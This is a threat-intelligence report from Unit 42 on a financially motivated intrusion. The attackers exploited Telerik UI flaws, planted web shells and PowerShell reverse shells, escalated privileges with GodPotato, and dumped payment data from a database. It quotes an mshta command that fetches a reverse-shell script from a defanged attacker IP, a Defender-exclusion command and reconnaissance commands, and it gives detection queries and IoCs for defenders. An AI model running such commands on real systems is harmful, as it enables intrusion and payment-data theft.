[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Actor Groups](https://unit42.paloaltonetworks.com/category/threat-actor-groups/ "Threat Actor Groups")
* [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/ "Cybercrime")  
  [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/)

# Silent Skimmer Gets Loud (Again)

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 11 min read  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/ "Advanced DNS Security")[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/product-category/advanced-threat-prevention/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/product-category/cloud-delivered-security-services/ "Cloud-Delivered Security Services")[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/product-category/cortex/ "Cortex")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")[![Cortex Xpanse icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex Xpanse](https://unit42.paloaltonetworks.com/product-category/cortex-xpanse/ "Cortex Xpanse")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/product-category/cortex-xsiam/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Veronika Senderovych](https://unit42.paloaltonetworks.com/author/veronika-senderovych/)
  * [Chema Garcia](https://unit42.paloaltonetworks.com/author/chema-garcia/)
  * [Zack Fink](https://unit42.paloaltonetworks.com/author/zack-fink/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:November 7, 2024

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/)
  * [Threat Actor Groups](https://unit42.paloaltonetworks.com/category/threat-actor-groups/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [C++](https://unit42.paloaltonetworks.com/tag/c/)
  * [CL-CRI-0941](https://unit42.paloaltonetworks.com/tag/cl-cri-0941/)
  * [CVE-2017-11317](https://unit42.paloaltonetworks.com/tag/cve-2017-11317/)
  * [CVE-2019-18935](https://unit42.paloaltonetworks.com/tag/cve-2019-18935/)
  * [GodPotato](https://unit42.paloaltonetworks.com/tag/godpotato/)
  * [Python](https://unit42.paloaltonetworks.com/tag/python/)
  * [Remote Code Execution](https://unit42.paloaltonetworks.com/tag/remote-code-execution/)
  * [Reverse shells](https://unit42.paloaltonetworks.com/tag/reverse-shells/)
  * [RingQ loader](https://unit42.paloaltonetworks.com/tag/ringq-loader/)
  * [Silent Skimmer](https://unit42.paloaltonetworks.com/tag/silent-skimmer/)
  * [Telerik UI](https://unit42.paloaltonetworks.com/tag/telerik-ui/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/?pdf=download&lg=en&_wpnonce=c280d701ab "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/?pdf=print&lg=en&_wpnonce=c280d701ab "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](<mailto:?subject=Silent%20Skimmer%20Gets%20Loud%20(Again)&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F> "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](<https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&title=Silent%20Skimmer%20Gets%20Loud%20(Again)> "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](<https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&text=Silent%20Skimmer%20Gets%20Loud%20(Again)> "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](<https://mastodon.social/share?text=Silent%20Skimmer%20Gets%20Loud%20(Again)%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F> "Share in Mastodon")

## **Executive Summary**

In late May 2024, Unit 42 researchers observed an adversary compromising multiple web servers to gain access to the environment of a multinational organization headquartered in North America. Based on overlaps in adversary infrastructure and tools, as well as tactics, techniques and procedures (TTPs), it's possible to attribute the activity identified to the same threat actor behind the Silent Skimmer campaign.

In September 2023, an online payment scraping campaign was uncovered and dubbed Silent Skimmer. Since then, there has been little to no news of Silent Skimmer -- until now.

According to our research, the financially motivated threat actor behind the Silent Skimmer campaign is targeting organizations that host or create payment infrastructure and gateways. Unit 42 tracks the activity identified in this article as [CL-CRI-0941](https://unit42.paloaltonetworks.com/from-activity-to-formal-naming/).

Palo Alto Networks customers are better protected from these threats through [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr) and [XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam), as well as [Cloud-Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions) including [Advanced URL Filtering](https://docs.paloaltonetworks.com/advanced-url-filtering/administration), [Advanced DNS Security](https://docs.paloaltonetworks.com/dns-security), [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention) and [Advanced WildFire](https://docs.paloaltonetworks.com/wildfire). [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse) is able to identify internet-facing instances of Telerik UI. Organizations can engage the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) for specific assistance with this threat and others.

| **Related Unit 42 Topics** | [**Remote Code Execution (RCE)**](https://unit42.paloaltonetworks.com/tag/remote-code-execution/) |
|----------------------------|---------------------------------------------------------------------------------------------------|

## **Observed Activities and TTPs**

In May 2024, Unit 42 researchers investigated an incident where attackers compromised multiple web servers to gain access to their environment and dump payment information. The threat actor gained an initial foothold on the servers by exploiting a couple of one-day Telerik user interface (UI) vulnerabilities.

Telerik UI is a popular framework for developing the user interface of [ASP.NET web applications](https://dotnet.microsoft.com/en-us/apps/aspnet). The threat actor attempted to exploit two Telerik UI vulnerabilities to gain initial access to the environment:

* [CVE-2017-11317](https://nvd.nist.gov/vuln/detail/CVE-2017-11317) --- Unrestricted file upload via weak encryption
* [CVE-2019-18935](https://nvd.nist.gov/vuln/detail/CVE-2019-18935) --- Remote code execution via insecure deserialization

Adversaries commonly exploit both of these vulnerabilities. They are a part of CISA's Known Exploited Vulnerabilities Catalog.

The vulnerabilities allow for remote code execution on servers running older, vulnerable versions of Telerik UI. We recommend upgrading to the [latest available version](https://www.telerik.com/support/whats-new/aspnet-ajax/release-history).

Following the vulnerabilities' exploitation, the attacker executed multiple reconnaissance commands and gained persistence. The following commands were among those executed:

* set
* whoami
* quser
* net user
* dir
* tasklist /svc
* ipconfig
* netstat -ano | findstr \\"443\\"
* net localgroup administrators
* dir c:\\users\\public
* "C:\\Windows\\system32\\ARP.EXE" -a
* "C:\\Windows\\system32\\systeminfo.exe"
* "C:\\Windows\\system32\\reg.exe" query "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions" /s
* cmd /c hostname

The threat actor leveraged several techniques to achieve a foothold and execution onto the servers and environment.

The attacker uploaded multiple web shells, mainly to the following directories:

* C:\\Users\\Public\\Music\\
* C:\\WebRoot\\Health Checks\\Default\\
* C:\\WebRoot\\Web Applications\\\*\\\*\\Images\\Common\\
* C:\\WebRoot\\IIS\\Web Applications\\\*\\\*\\Images\\Common\\
* C:\\WebRoot\\IIS\\Web Applications\\Production\\\*\\\*\\Images\\Common\\

The attacker also dropped and executed multiple reverse shells, as we describe later in the [Reverse Shells](#post-137319-_a63ybt6s65b8) section. These reverse shells were responsible for the rest of the executions we describe in this article.

We also observed that the threat actor used tunneling and reverse proxy tools such as [Fuso](https://github.com/editso/fuso) and [FRP](https://github.com/fatedier/frp). These allowed the attacker to expose the exploited servers located behind a network address translation (NAT) or firewall to the internet.

We observed the following reverse proxy executions:

![Screenshot of bulleted list of the reverse proxy executions.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-256475-137319-1.png)

We observed the attacker using [GodPotato](https://github.com/BeichenDream/GodPotato) for privilege escalation. GodPotato executed using a Base64-encoded PowerShell command that translated to the command shown in Figure 1 below.
![Screenshot of a command line interface displaying a PowerShell code snippet.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2.png) Figure 1. GodPotato download and execution.

The attacker retrieved other GodPotato payloads from http://48\[.\]218.138.60/a.txt and http://48\[.\]218.138\[.\]60/m.txt. They used these to execute powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\\ to add D:\\ to the Windows Defender exclusion list to evade detection.

### Native C++ Code Embedded within .NET Binaries

To bypass the security measures and make the analysis process more difficult, the threat actor used .NET binaries with native C++ code embedded by leveraging [mixed mode assemblies](https://learn.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=msvc-170). The threat actor used this as a way to include code from one programming language embedded in another, which is an old technique some programming languages natively support.

In this case, mixed-mode assemblies were used to embed native C++ code within a .NET binary. As a result, some .NET binary analysis tools are unable to analyze the embedded ([unmanaged](https://learn.microsoft.com/en-us/dotnet/standard/managed-code)) code. This requires researchers to put in extra effort to identify the malicious payload. In 2022, [Mandiant \[PDF\]](https://www.mandiant.com/sites/default/files/2022-11/06-alamode.pdf) used a sample employing this technique in their annual FLARE-On Challenge.

The threat actor used this feature to create .NET wrapper binaries to execute malicious code. So when analyzing the binaries with .NET analysis tools like dnSpy for instance, there is no code to be executed as shown in Figure 2.
![Screenshot of a code editor displaying a simple code snippet with the 'using System;' directive and an internal class declaration named '<Module>'.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-261509-137319-3.png) Figure 2. Empty .NET code.

Although this is not always the case, Figure 3 shows how dnSpy can identify the usage of mixed mode assemblies and warns about the unmanaged code, also showing the native entry point.
![A screenshot of code indicating that the assembly contains unmanaged code, with specific sections highlighted, using the .NET Framework 4.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-263861-137319-4.png) Figure 3. dnSpy warning on the usage of unmanaged code.

When jumping to the native entry point address, it is possible to identify the native code as shown in Figures 4 and 5.
![Screenshot displaying source code in an IDE, featuring lines of assembly language associated with the DllMainCRTStartup function. Some of the code is highlighted in a red box and a segment is underlined in red on the first line.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5.png) Figure 4. Native entry point content. ![Screenshot of a code snippet written in C/C++ that appears to handle process attachment and detachment with function calls identified by markers pointing to specific lines.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-270019-137319-6.png) Figure 5. Native code calling the function written by the threat actor.

By following the execution flow, it is possible to reach the malicious command executed, as identified in Figure 6. The malicious command uses [Microsoft HTML Application Host](<https://learn.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v=winembedded.5)?redirectedfrom=MSDN>) (MSHTA) [Living Off the Land Binaries](https://www.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/) (LOLBin) to download and execute a remote [HTA](<https://learn.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN>) (HTML Application) payload. It then [proxies the execution](https://attack.mitre.org/techniques/T1218/005/) of the malicious code through a legitimate and official binary.
![Image depicting a computer screen with a flowchart and assembly code. The flowchart includes steps labeled "detonation proc begin," "short\_exit," and "detonation end," connected by arrows. The code includes commands related to network data handling, and there is an emphasized portion showing a network address "http://20.20.240.16/SecurityDataEntry.stra". Red arrows highlight the connection between the flowchart and specific parts of the code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-272732-137319-7.png) Figure 6. Embedded native code executing the malicious command.

### RingQ Loader

During the investigation, Unit 42 researchers observed the threat actor leveraging the RingQ loader as part of their arsenal. The RingQ loader comprises two main components. One is a tool that creates an encrypted file containing the binary to be loaded and executed, and the other is the loader itself, which [reflectively loads the binary](https://attack.mitre.org/techniques/T1620/).

RingQ can also act as a downloader if configured to do so. Figure 7 shows the logic of the loader and the execution branches to load the encrypted file locally or remotely from a URL specified in the binary resources.
![Screenshot of a computer screen displaying code in a text editor. Various arrows indicate the most relevant parts of the code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-275446-137319-8.png) Figure 7. Execution logic source code from the GitHub repository.

The samples identified in the activity covered in this article use different methods to load the encrypted payload. Figure 8 shows the value set to the Portable Executable (PE) string table resource of the RingQ loader to download the encrypted payload from a remote URL.
![Text from a code editor showing a STRINGTABLE in a programming language, including a URL link in the fourth line, configured for simplified Chinese language settings.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-278509-137319-9.png) Figure 8. Remote location of the encrypted payload using the RingQ author nickname as the filename.

The GitHub repository of the RingQ loader also includes a tool (QVM250) to tweak the resources of the PE file and include resources from original binaries in an attempt to trick and bypass some security measures. In the activity identified, one of the samples was mimicking PuTTY, a common SSH client for MS Windows (Figure 9).
![Screenshot of a software interface for PuTTY, displaying an "About PuTTY" dialog box with version information and buttons for viewing the license, visiting the website, and closing the dialog.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-281067-137319-10.png) Figure 9. Fake resources included in the loader.

### Compiled Python - Dumping Payment Information

After the adversary secured web shell access on the server, they wrote a Windows executable to disk with a .txt file extension. Based on strings in the binary, we could determine that it was a Python script compiled to an executable with [PyInstaller](https://pyinstaller.org/en/stable/) (Figure 10).
![Command Prompt window open on a desktop showing error messages related to PyInstaller and the conversion of file paths to UTF-8. The prompt is located at C:\\malware\\strings.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-283841-137319-11.png) Figure 10. PyInstaller compilation strings.

Using a tool like [PyInstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor), we could reverse that process and extract the compiled Python bytecode. The bytecode is readable but harder to understand. By using a tool like [uncompyle6](https://github.com/rocky/python-uncompyle6/), we reverted the Python bytecode to its original Python form.

The nearly 8 MB original executable boils down to a simple Python script, shown below in Figure 11. The rest of the files were artifacts of PyInstaller that allow for proper packaging and execution. The script itself is simple and uses hard-coded credentials to connect to a database in the victim's organization and dump payment information to a .csv file.
![Screenshot of Python code using the pyodbc module to run a SQL query on a database, fetch data, and write it to a CSV file named 'out.csv'.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-286781-137319-12.png) Figure 11. Python script for executable.

### Reverse Shells

Once the threat actor gained a foothold on the servers by exploiting the Telerik vulnerabilities, they attempted to achieve persistence by dropping multiple web shells as well as multiple PowerShell reverse shells.

During our investigation, we observed that the threat actor installed reverse shells by executing multiple MSHTA commands that retrieved an .hta script from a hard-coded IP address, such as the following:

* mshta http://172\[.\]86.96.245/129-80.hta (the .hta file script shown in Figure 12)

![This image shows a computer screen with a script written in a programming language. The screen displays multiple lines of code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13.png) Figure 12. 129-80.hta script content.

We observed these executions with multiple different IP addresses and file names. The IP address in the URL was also used as the command and control (C2) IP address for the reverse shell. The filename represented the port in most cases, which is shown in the first two lines in Figure 12. The .hta file shown in Figure 13 is a VBScript that executes a Base64-encoded PowerShell command that decodes to a PowerShell script.
![Screenshot of programming code on, set in a text editor with highlighted syntax.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14.png) Figure 13. The reverse shellcode.

The reverse shells were also installed by downloading a .ps1 script, which is the reverse shell, using PowerShell's Invoke-WebRequest utility and executing it (Figure 14).
![Screenshot of PowerShell code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15.png) Figure 14. PowerShell executes Invoke-WebRequest utility.

## **Attribution and Overlaps**

One of the Cobalt Strike C2 IP addresses identified in this activity matches an IP address mentioned in a [Sophos X-Ops](https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/) report, where a similar infection chain resulted in an Ambitious Scorpius (BlackCat) ransomware attack. Since Ambitious Scorpius stopped operations after performing an [exit scam](https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/), this overlap may belong to an affiliate or a cybercrime cluster used across both attacks.

The BlackBerry Research and Intelligence Team first wrote about the [Silent Skimmer](https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala) campaign back in September 2023. LevelBlue Labs later [published their own findings](https://cybersecurity.att.com/blogs/security-essentials/dont-check-out-credit-card-skimming-activity-observed). Since then, we haven't heard much about the campaign.

A significant number of the TTPs we observed in our investigation align with the ones described in BlackBerry's blog starting from the initial access vector, which is the exploitation of publicly facing web servers. Specifically, both campaigns involved the exploitation of Telerik UI vulnerabilities that are over 5 years old.

Following initial access, there were mostly identical techniques of installing reverse shells by executing mshta.exe, which downloads and executes an .hta script. While in BlackBerry's incident, the .hta file is a VBScript that downloads and executes a .ps1 script using certutil.exe, which is the reverse shell. In the incident Unit 42 was involved in, the .hta file is a VBScript that executes a PowerShell encoded command that decodes to a PowerShell script, which is the final reverse shell.

In the incident we were involved in, the attackers used reverse proxy tools and web shells to maintain persistence and control over compromised systems. Additionally, they leveraged GodPotato (a privilege escalation tool) and deployed Cobalt Strike for post-exploitation activities. These findings align closely with the tactics detailed in the BlackBerry blog.

The main difference between the campaigns is the method used to extract the payment and financial data. In the campaign described by BlackBerry, the attackers append malicious code to different payment-related pages that scrape the payment data. In the campaign we observed, the threat actor used a compiled Python script to connect to a database in the victim's organization and then dumped payment information to a CSV file for exfiltration.

With all this information, in alignment with the [Unit 42 naming convention](https://unit42.paloaltonetworks.com/from-activity-to-formal-naming/) procedures, we are tracking this threat activity cluster as CL-CRI-0941.

## **Conclusion**

The threat actor behind Silent Skimmer has resurfaced after a year, now leveraging a new technique for scraping payment details. Despite this update, the group's TTPs remain largely consistent with previous activity. This persistence underscores the need for organizations to stay vigilant and patch vulnerabilities promptly to defend against this enduring threat.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr) and [XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam) help protect against the threats described through modules including Behavioral Threat Protection and Local Analysis.
* [Cloud-Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions), including:
  * The [Advanced WildFire](https://www.paloaltonetworks.com/products/secure-the-network/wildfire) machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  * [Advanced URL Filtering](https://docs.paloaltonetworks.com/advanced-url-filtering/administration) and [Advanced DNS Security](https://docs.paloaltonetworks.com/dns-security) identify known domains and URLs associated with CL-CRI-0941 activity as malicious.
  * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention) signatures exist for activity described in this article, including the CVEs mentioned.

[Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse) is able to identify internet-facing instances of Telerik UI, including versions that are specifically associated with the vulnerabilities above.

If you think you might have been compromised or have an urgent matter, get in touch with the[Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:

* North America Toll-Free: 866.486.4842 (866.4.UNIT42)
* EMEA: +31.20.299.3130
* APAC: +65.6983.8730
* Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org).

**XQL Queries**  
// Description: mshta.exe executing a powershell encoded command config case\_sensitive = false | dataset = xdr\_data | filter event\_type = ENUM.PROCESS and event\_sub\_type = ENUM.PROCESS\_START | filter actor\_process\_image\_name = "mshta.exe" // Filtering powershell with base64 encoded commands | filter action\_process\_image\_name = "powershell.exe" and action\_process\_image\_command\_line ~= "\[A-Za-z0-9+\\/\]{50,}\[=\]{0,2}" // Decoding the base64 encoded commands | alter decoded\_base64 = convert\_from\_base\_64(arrayindex(regextract(action\_process\_image\_command\_line, "\[A-Za-z0-9+\\/\]{50,}\[=\]{0,2}"),0)) | alter decoded\_base64 = replex(decoded\_base64, "\\x00", "") // Trick to remove null bytes in decoded base64 output | fields \_time, agent\_hostname, agent\_ip\_addresses, action\_process\_image\_name, action\_process\_image\_command\_line, actor\_process\_command\_line, causality\_actor\_process\_command\_line, decoded\_base64

|-------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | // Description: mshta.exe executing a powershell encoded command config case\_sensitive = false | dataset = xdr\_data | filter event\_type = ENUM.PROCESS and event\_sub\_type = ENUM.PROCESS\_START | filter actor\_process\_image\_name = "mshta.exe" // Filtering powershell with base64 encoded commands | filter action\_process\_image\_name = "powershell.exe" and action\_process\_image\_command\_line ~= "\[A-Za-z0-9+\\/\]{50,}\[=\]{0,2}" // Decoding the base64 encoded commands | alter decoded\_base64 = convert\_from\_base\_64(arrayindex(regextract(action\_process\_image\_command\_line, "\[A-Za-z0-9+\\/\]{50,}\[=\]{0,2}"),0)) | alter decoded\_base64 = replex(decoded\_base64, "\\x00", "") // Trick to remove null bytes in decoded base64 output | fields \_time, agent\_hostname, agent\_ip\_addresses, action\_process\_image\_name, action\_process\_image\_command\_line, actor\_process\_command\_line, causality\_actor\_process\_command\_line, decoded\_base64 |

// Description: MSHTA command line config case\_sensitive = false | dataset = xdr\_data | filter event\_type = ENUM.PROCESS and event\_sub\_type = ENUM.PROCESS\_START | filter action\_process\_image\_name = "mshta.exe" and action\_process\_image\_command\_line ~= "http://(?:(?:\\d|\[01\]?\\d\\d|2\[0-4\]\\d|25\[0-5\])\\.){3}(?:25\[0-5\]|2\[0-4\]\\d|\[01\]?\\d\\d|\\d)/(?:\\d{2,3}|\\d{1,3}-\\d{2,3}|securityhealth|securityhealthsystray|shell|\\w+).hta" | fields \_time, agent\_hostname, agent\_ip\_addresses, action\_process\_image\_name, action\_process\_image\_command\_line, actor\_process\_command\_line, causality\_actor\_process\_command\_line

|-------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | // Description: MSHTA command line config case\_sensitive = false | dataset = xdr\_data | filter event\_type = ENUM.PROCESS and event\_sub\_type = ENUM.PROCESS\_START | filter action\_process\_image\_name = "mshta.exe" and action\_process\_image\_command\_line ~= "http://(?:(?:\\d|\[01\]?\\d\\d|2\[0-4\]\\d|25\[0-5\])\\.){3}(?:25\[0-5\]|2\[0-4\]\\d|\[01\]?\\d\\d|\\d)/(?:\\d{2,3}|\\d{1,3}-\\d{2,3}|securityhealth|securityhealthsystray|shell|\\w+).hta" | fields \_time, agent\_hostname, agent\_ip\_addresses, action\_process\_image\_name, action\_process\_image\_command\_line, actor\_process\_command\_line, causality\_actor\_process\_command\_line |

//Description: Looks for IIS processes dropping DLLs with a naming convention used in a public CVE-2019-18935 POC and in the current incident dataset = xdr\_data |filter event\_type = ENUM.FILE |filter actor\_process\_image\_name = "w3wp.exe" |filter action\_file\_name ~= "^\[0-9\]{10}\\.\[0-9\]{5,7}(?:\\.dll|sleep\\-\[0-9\]{10}-amd64)" |fields \_time, agent\_hostname, actor\_process\_image\_name, actor\_process\_command\_line, action\_file\_path, action\_file\_sha256

|-------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | //Description: Looks for IIS processes dropping DLLs with a naming convention used in a public CVE-2019-18935 POC and in the current incident dataset = xdr\_data |filter event\_type = ENUM.FILE |filter actor\_process\_image\_name = "w3wp.exe" |filter action\_file\_name ~= "^\[0-9\]{10}\\.\[0-9\]{5,7}(?:\\.dll|sleep\\-\[0-9\]{10}-amd64)" |fields \_time, agent\_hostname, actor\_process\_image\_name, actor\_process\_command\_line, action\_file\_path, action\_file\_sha256 |

## **Indicators of Compromise**

|------------------------------------------------------------------|------------|--------------------------------|
| **Value**                                                        | **Type**   | **Description**                |
| 55271d94eb3c95bb6a1965d44bade5ecef5ff610e87133f169e602eb94c39d6b | SHA256     | RingQ Loader                   |
| 1b325d32bc99db4b16e2cc4d4810c195f3643936d7ff5baee43ddd18cae9b2a6 | SHA256     | RingQ Loader                   |
| 85d67f9f6f82de5a8f5f92fcf9a82bbed2ff6f6d91a06a058a40c5a64882149b | SHA256     | RingQ Loader                   |
| b44e6fd83b87d50c8aa8cf62de2578a13c22292fcf298b7664ed828804280dbe | SHA256     | RingQ Loader                   |
| e3746de8993069f343a7334046a2361318e213e13883513a7c0713a847fd4dc9 | SHA256     | RingQ Loader                   |
| 64ae2bf6920311be2521c47678c04299bd24c2caec2df5b340aa212a69760fda | SHA256     | RingQ Loader                   |
| 12508b830149c2d84f2c80947e78218128d16a834c8d0695068f3e773ac62ef9 | SHA256     | GodPotato                      |
| 0aa0ca465170315d2f02c471d5d96ce5fbd6076f59be83fa5398968e951a5f51 | SHA256     | GodPotato                      |
| dc53581d4c9140b0f987eb6686d67db6d777f8c89114b062be35b8f2847aa66f | SHA256     | Usage of mixed mode assemblies |
| 3579bae222eb8d7a7c3c16598cf9e81aecbbfc1a2ac2168430e48acfb02cfb24 | SHA256     | Usage of mixed mode assemblies |
